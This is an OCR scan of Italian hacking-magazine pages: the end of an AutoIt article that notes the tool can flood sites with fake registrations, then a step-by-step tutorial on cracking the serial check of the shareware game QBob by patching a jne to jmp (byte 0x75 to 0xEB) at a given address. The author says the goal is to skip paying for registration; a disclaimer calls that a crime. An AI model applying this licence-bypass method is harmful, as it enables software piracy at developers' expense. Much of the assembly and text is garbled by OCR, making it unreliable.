esistenti oppure che li sostituiscono. 
RunasSPC, per esempio, è un 
programma a pagamento che gestisce 
le nostre password che può essere 
sostituito da uno script chiamato 
EncryptedRunAs, disponibile sul 
forum di Autolt. L'estensione di 
programmi, tuttavia, è una pratica più 
diffusa: uno script come OutlookEX 
UDF, che aggiunge funzioni di notifica 
a Outlook, vale da solo l'installazione 


di Autolt e risulta persino migliore di 
equivalenti programmi commerciali. 
Se cerchiamo funzioni quali l'hash 
SHA o le codifiche Base 64, invece, 
possiamo fare riferimento ad altri 
script come la Autolt Machine Code 
Algorithm Collection (anche questa 
disponibile gratuitamente sul forum). 


NON PER TUTTI 


La possibilità di manipolare oggetti di 
altri programmi che ci offre Autolt è 
certamente un pericolo perché anche 
il programmatore meno esperto può 
creare script in grado di svolgere 
operazioni ripetitive ma anche la cui 
ripetizione può essere dannosa per 
altri. Un esempio è la compilazione 

di moduli di iscrizione a siti con dati 
fittizi: a mano fa, se non altro, perdere 
tempo. Con Autolt può dar vita a 
migliaia di iscrizioni in brevissimo 
tempo. Come spesso avviene, 
ricordiamoci che il problema non 
riguarda lo strumento (potente) ma il 
modo in cui viene utilizzato. 
Personalmente intendo utilizzarlo per 
creare un'interfaccia più pratica di 
quella che il geniale creatore di GUI di 
cui parlavo all’inizio mi ha costretto a 
usare finora. Basta click inutili! 


HACKER JOURNAL 125 


Lltera 


GAMES/ME DIO 


HACKING 


la A 
LE TECNICHE DI: PROTEZIONE DEI 


GIOCHI SI STANNO EVOLVENDO, 
MA LA CHIAVE SERIALE E 


SEMPRE DI GRAN MODA, 


VEDIAMO COME AGGIRARLA. 


o scopo di questo articolo, 
che ha una funzione 
puramente didattica e si 
rivolge anche a coloro che 
programmano protezioni 
per i giochi che sviluppano, è 
quello di spiegare come bypassare 
la richiesta di inserimento di un 
codice seriale da parte di un gioco. 
Il gioco in questione si chiama 
QBob, risale a qualche anno fa 
(una decina per la precisione) e 
richiede una registrazione per la 
somma di 20 $ per poter avere 
più livelli e altro. Riprendendolo 
dopo un po’ di tempo ho deciso 
di provare a riversarlo per evitare 
di pagare la registrazione (a un 
team di programmatori che molto 
probabilmente non esiste nemmeno 
più, almeno sotto il nome di 
MoonRock Software Inc.). 


2. GLI STRUMENTI 


Per il nostro scopo avremo bisogno 
di poco software, che elenchiamo di 
seguito: 


- QBob: ovviamente, per riversarlo, 
avremo bisogno del gioco stesso, che 
possiamo trovare in versione demo a 


http:/Awww.moonrock.com/qbob3214. 
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exe. 
-W32Dasm: nell’articolo 

verrà usato w32dasm come 
disassembler, ma potete 

usare il vostro preferito senza 
problemi. Per scaricare 

W32Dasm il link è http:// 
download.famouswhy.com/ 
software/w32dsm87.zip 

- HxD: come per W32Dasm, 

come editor esadecimale nell'articolo 
verrà usato HxD per il semplice fatto 
che è il primo editor esadecimale che 
ho trovato per Windows cercando su 
google, qualunque altro editor vi offrirà 
le stesse performance. HxD lo trovate 
sul sito http://hxd.softonic.it/ . 

Il disassembler ci servirà per 
visualizzare il contenuto dell’eseguibile 
di QBob nelle sue istruzioni in 
assembly, in modo da renderci la vita 
un po’ più semplice invece di andare 

a leggere l'eseguibile in binario. 

Una volta che avremo individuato la 
porzione di programma da modificare 
lo andremo a fare utilizzando l’editor 
esadecimale, che consente la 
modifica di file binari. 


3. ALCUNE BASI 
PRIMA DI INIZIARE 


Per comprendere la parte 


HI-SCORE SCORE<2> 
2008 


è è è dala 
Ah deh dh dh 4 dh dh dh de 
CAZAGLAI ALI LL. 


+ 
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seguente dell’articolo è bene avere 
alcune conoscenze del campo 

in cui andremo a lavorare, ossia 
l’assembily e il reverse engineering. 
L'assembly è il linguaggio più vicino 
al linguaggio macchina. Quello che 
andremo a fare sarà, utilizzando 

un disassembler, leggere il listato 

in assembly, trovare la parte di 
istruzioni che si occupa del controllo 
del codice seriale e modificarlo in 
modo da permetterci di inserire 
qualunque seriale e farlo accettare. “i 
Il lavoro del disassembler è quello di 
prendere i singoli byte che formano 
un file binario e convertirli nella 
stringa a cui è convenzionalmente 
assegnato il dato byte; per 

esempio invece di andare a leggere 
01010000 leggeremo ‘push eax’, 
che è un'istruzione utilizzata per 
inserire nello stack il contenuto 

del registro eax. Nell'esempio 
01010000, corrispondente a 0x50, è 
l’opcode relativo all'istruzione ‘push 


eax’, quindi se noi, per esempio, 
volessimo modificare il programma 
mettendo nello stack il contenuto 
di ecx invece che quello di eax 
dovremmo modificare l'istruzione 
in ‘push ecx’, che ha come opcode 
0x51: andremo quindi a cercare con 
l'editor esadecimale il byte 0x50 
che ci interessa e cambiarlo con 


0x51. È importante tenere a mente 
questo metodo, dato che andremo a 
usarlo dopo per modificare il nostro 
eseguibile. Ora andiamo a vedere 
un'istruzione particolare, ossia JMP, 
che, come si può capire dal nome 
(Jump) effettua un “salto” di un 
numero di byte determinato. 

Questo tipo di salto può essere 


mov $1 %eax 
cmp $1 %eax 
imp lab2 
lab1: 

mov $2 %eax 
lab2: 

inc %eax 


mette il valore 1 nel registro eax 
confronta il registro eax con il valore 1 
avviene un salto a lab2 qualunque sia l’esito del confronto 


quest’istruzione non verrà eseguita 


incondizionato o condizionato.Il 
primo è identificato dall’istruzione 
imp, mentre quelli condizionati hanno 
differenti istruzioni a seconda della 
‘condizione per cui avviene il salto. 

| salti non condizionati saltano in 
qualunque situazione, se per esempio 
abbiamo questo listato: 


go” 


eax, ha valore 1, viene incrementato, avrà quindi il valore 2 al suo interno 


(mi scuso se la sintassi è AT&T 
ma è l’unica che sono in grado 

di scrivere :) Il codice è già 
commentato, quindi non c'è molto 
da dire, vediamo che il jump 

non condizionato salterà alcune 
istruzioni. Se invece abbiamo: 


mov. $1, VWheax 
cmp. $1, heax 
jne lab2 

labi: 

mov. $2, %eax 


lab2: 
ino %eax 


.. Inquesto caso notiamo che, al 

. posto di una jump non condizionata 
ne abbiamo una condizionata,nello 
specifico una Jump if Not Equal 
(JNE).Questo tipo di jump salta 
solo se il confronto avvenuto in 
precedenza non è uguale, nel 
nostro caso, dato che abbiamo 
messo in eax il valore 1 e poi il 
registro è confrontato con il valore 


,1 il salto non verrà effettuato e si 
proseguirà quindi con l’istruzione 
‘mov $2, %eax'. Ciò significa che 
alla fine del listato il registro eax 
avrà come valore 3. Altri tipi di 
salti condizionati sono JE (Jump 

if Equal), JZ (Jump if Zero), JNZ 
(Jump if Not Zero),JG (Jump if 
Grater), JGE (Jump if Greater 

or Equal), JL (Jump if Less), e 
molti altri... Per chi conoscesse 
un linguaggio di alto livello (per 
esempio il C) avrà capito che con 
questi svariati Jump è possibile 
gestire tutti i tipi di cicli/condizioni 
che si utilizzano negli altri 
linguaggi, per esempio un ciclo for 
non è altro che una cosa simile: 


mov S$0, %eax 

lab: 

; istruzioni del ciclo 

inc %eax 

cmp $10, %eax ; for 
(i=O;i<10;i++) 

il lab 


Questo non è molto importante 

ai fini di quanto andremo a fare 

nel nostro articolo, ma è sempre 
interessante sapere che una 
struttura ad alto livello come il for 
alla fine non è altro che una serie di 
poche istruzioni in assembly. 


Una volta installato QBob apriamo 
l'eseguibile che troviamo nella 
directory in cui l’ abbiamo installato 
con W32Dasm. Quando l’avremo 
aperto avremo davanti la serie di 
istruzioni che vengono eseguite dal 
nostro programma, con a fianco i 
relativi opcode. Dal momento che 
abbiamo, come potrete notare, 

una serie di istruzioni bella lunga, 
dovremo restringere il campo di 
azione alle poche istruzioni che 


ci interessano.Per questo scopo 
W32Dasm può fare una cosa molto 
interessante, ossia mostrarci tutte 
le stringhe che vengono utilizzate 
all'interno del programma e i punti 
in cui vengono utilizzate. Prima 

di usare questo tool dovremo 
individuare la stringa che vogliamo 
utilizzare per trovare il punto del 
programma in cui intervenire. 

La stringa ideale è quella che 
viene mostrata nel messaggio 

di errore se inseriamo un serial 
sbagliato. Andando a ricercare 
dove viene usata quella stringa 
sapremo dov'è che viene fatto 
comparire il messaggio d'errore e 
di conseguenza potremo risalire 
al punto in cui viene effettuato 

il controllo del seriale da noi 
inserito con quello calcolato dal 
programma. Una volta arrivati a 
quel punto dovremo modificare 
l'eseguibile in modo che venga 
accettato qualunque serial, ma 
procediamo un passo alla volta. 
Come abbiamo detto apriamo 
QBob, dal menù Game scegliamo 
Register, inseriamo dei dati 
casuali e otterremo il messaggio 
d'errore: 

“The serial number is invalid. 


Please make sure it exactly 
matches (including dashes) the 
serial number provided to you by 
MoonRock Software Inc.” 

Ora chiudiamo QBob (magari 
prima facciamoci una partita) 

e torniamo al disassembler. 
Andiamo sul menu Refs, quindi 
String Data References, ossia, 
come detto in precedenza, il tool 
che ci consente di risalire alle 
stringhe usate dal programma. 
Scorrendo la lista di stringhe 
troveremo quella che ci interessa, 
“The serial number is invalid." 
Selezioniamola e verremo 
direzionati alla parte di codice che 
utilizza quella stringa: 


* Referencedbya(U) 
nconditionalor(C) 
onditionallumpatAddress: 
|:0042EDAA(C) 


| 

10042EDD3 8B4660 

moveax, dwordptr[esi+60] 
:0042EDD6 50 push eax 
10042EDD7 E8F4010000 
0042EFDO 

10042EDDC 85C0 

test eax, eax 
10042EDDE 7527 


call 


0042EE07 

10042EDEO E802580200call 
004545E7 

:0042EDES 8B4010 

mov eax, dword ptr [eax+10] 
10042EDE8 6A10 

push 00000010 


10042EDEA 50 push eax 


PossibleStringDataReffromDataObj 
>"Theserialnumberisinvalid.”- 
>"Pleasemakesureitexactlymatches” 
>”(includingdashes)theserial” 
>"numberprovidedyouby 


MoonRock">”Softwarelnc.” 


:0042EDEB 684C214700 

push 0047214C 
:0042EDFO 8BCE 

mov ecx, esi 
:0042EDF2 E8EFDC0100 

call 0044CAE6 
:0042EDF7 5E 

pop esi 

10042EDF8 8B4C240C 

mov ecx, dword 
ptr [esp+0C] 
:0042EDFC 64890D00000000 

mov dword pir 


À 


a 
ca di 


OI 


= 
DoS 


fs:[00000000], ecx 
:0042EE03 83C418 
a d add esp, 00000018 
:0042EE06 C3 È 

ret 
* Referencedbya(U) 
nconditionalor(C) 
onditionalJumpatAddress: 


|:0042EDDE(C) 

|:0042EE07 8B0D082B4700 
mov ecx, dword ptr [00472B08] 
:0042EE0D894C2408 

mov dword ptr [esp+08], ecx 
10042EE11 8B565C 

movedx, dword ptr [esi+5C] 
:0042EE14 8D442408 

leaeax, dword ptr [esp+08] 
10042EE18 52 

push edx 


PossibleStringDataReffromDataObj- 
>”QBobwillberegisteredto'%s'."- 
>"Isitcorrect?” 


|:0042EE19 6818214700 
push 00472118...... 


Vediamo chiaramente dove viene 
utilizzata la stringa. Ora dobbiamo 
letteralmente salire nel listato 

per arrivare a capire dov'è che 
avviene la “diramazione” in cui da 
una parte viene mostrato l'alert di 
errore e dall'altra viene registrato 
correttamente QBob. Nel nostro 
caso siamo fortunati: 


:0042EDDE 7527 jne 0042EE07 


Notiamo che avviene una Jump If 
Not Equal subito prima, e l’indirizzo 
a cui si viene portati è 0042EE07, 
che, se andiamo a vedere, si trova 
subito prima che venga utilizzata la 
stringa 


“QBob will be registered to ‘%s’. Is 
it correct?” 


il che dovrebbe farci pensare che 
la “diramazione” che stavamo 
cercando è proprio quella che 
abbiamo individuato. Siamo arrivati 
quindi al punto in cui sappiamo 
qual è l'istruzione da cui tutto 


dipende, dobbiamo solo capire 
come modificarla. 


5. RAGIONAMENTO 
VELOCE 


Sappiamo ora che le nostre 
istruzioni sono qualcosa del genere: 
test eax, eax ;confronto del serial 


jne addr sine a un indirizzo 
‘addr’ 
ila : istruzioni che 
mostrano il 
Po, : messaggio 
d'errore 
addr: 
ci; sistruzioni che 
concludono 
ila registrazione 
6. CAMBIARE LE 
ISTRUZIONI 
ei 


Il nostro scopo, adesso, è quello 
di cambiare le istruzioni, per farlo 
abbiamo molte possibilità, eccone 
un paio: 


test eax, eax  ;confronto del 
codice 
je/imp addr icon je il programma 
viene registrato solo se 

sil serial inserito è sbagliato, con 
una jmp 

sil programma viene registrato in 
‘ogni caso 


jistruzioni 


che mostrano il 

messaggio d’errore 

add: ; 
sistruzioni 


che concludono 


registrazione 


Modificando il jne con un;je 
sarebbe come cambiare da 
“registra il programma se il serial è 
corretto” a “registra il programma: 
se il serial inserito non è corretto”, 
usando un jmp invece “registra il 
programma in ogni caso” in quanto 
è un salto non condizionato. 


L'altra possibilità è quella di 
inserire il giusto numero di NOP È 
(Not Operation, istruzione che 
serve a non fare nulla e che ha 
come opcode 0x90) in modo che 
non venga eseguito nessun jump e 
l'esecuzione del programma venga 
fatta “scivolare” direttamente alla 
registrazione, facendo qualcosa del 
tipo: 


test eax, eax jconfrontodelcodice 
nop i 

nop 

nop 

modo portiamo il 


;In questo 


sprogramma direttamente alla fine 


nop sdella 
registrazione 
nop ; 
nop : 
addr:... 
Hoos sistruzioni 
che concludono 
su ila 
registrazione 
PAIN BYNTE 
PUO FARE LA 
DIFFERENZA 
nei] 


Delle soluzioni proposte 
nell'articolo verrà utilizzata la 
prima, che richiede la sostituzione 
del jne in un jmp, ma, volendo, si 
può usare anche il secondo metodo 
senza problemi o magari trovare 
altre vie... Basta usare la fantasia 
Per modificare il jne in una jmp 


NL 


dobbiamo sostituire l'opcode 0x75 
(ine) con OxEB (jmp) dell’istruzione 


10042EDDE 7527 jne 
0042EE07 


Mentre 0x27 è il numero di 

byte di cui saltare (nel caso 

39 bytes e, stranamente, 
0x0042EDDE (che è l'indirizzo 
dell’istruzione)+0x02(che 

sono il numero di byte usati 
dall’istruzione jne e che non 
vanno contanti)+0x27 (ossia di 
quanti byte saltare) ci da proprio 
0x0042EE07. 


Apriamo il nostro editor 
esadecimale e ricerchiamo la 
sequenza di byte: 


8B 46 60 50 E8 F4 01 00.00 85 
co 


che sono i byte subito 
prima della jne. Una 

volta trovati (magari non 
manualmente) possiamo 
sostituire il byte seguente 
(0x75) con OxEB. 


Salviamo e chiudiamo. Ora, 
per conferma, apriamo 
W32Dasm e andiamo 
all'indirizzo di prima: 


:0042EDDE EB27 imp 
0042EE07 


Tutto come previst. 
Avviamo ora l'eseguibile 
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che abbiamo modificato, se non 
abbiamo fatto nessun errore 
andando sul menu Game e in 
seguito su Register possiamo 
inserire qualunque nome associato 
a qualunque seriale, avere la 
nostra copia registrata di QBob, 
per poter accedere così agli altri 
livelli etc etc :) 


darkjokerhttp://darkjoker. 
byethost9.com 


DISCLAIMER 


Gli argomenti e le informazioni 
fornite nell'articolo sono da 
considerarsi a scopo puramente 
informativo. Utilizzare queste 
informazioni per evitare il 
pagamento della registrazione 
è un reato. L'autore e l'editore 
non si assumono nessuna 
responsabilità circa l'utilizzo 
improprio di quanto spiegato. 
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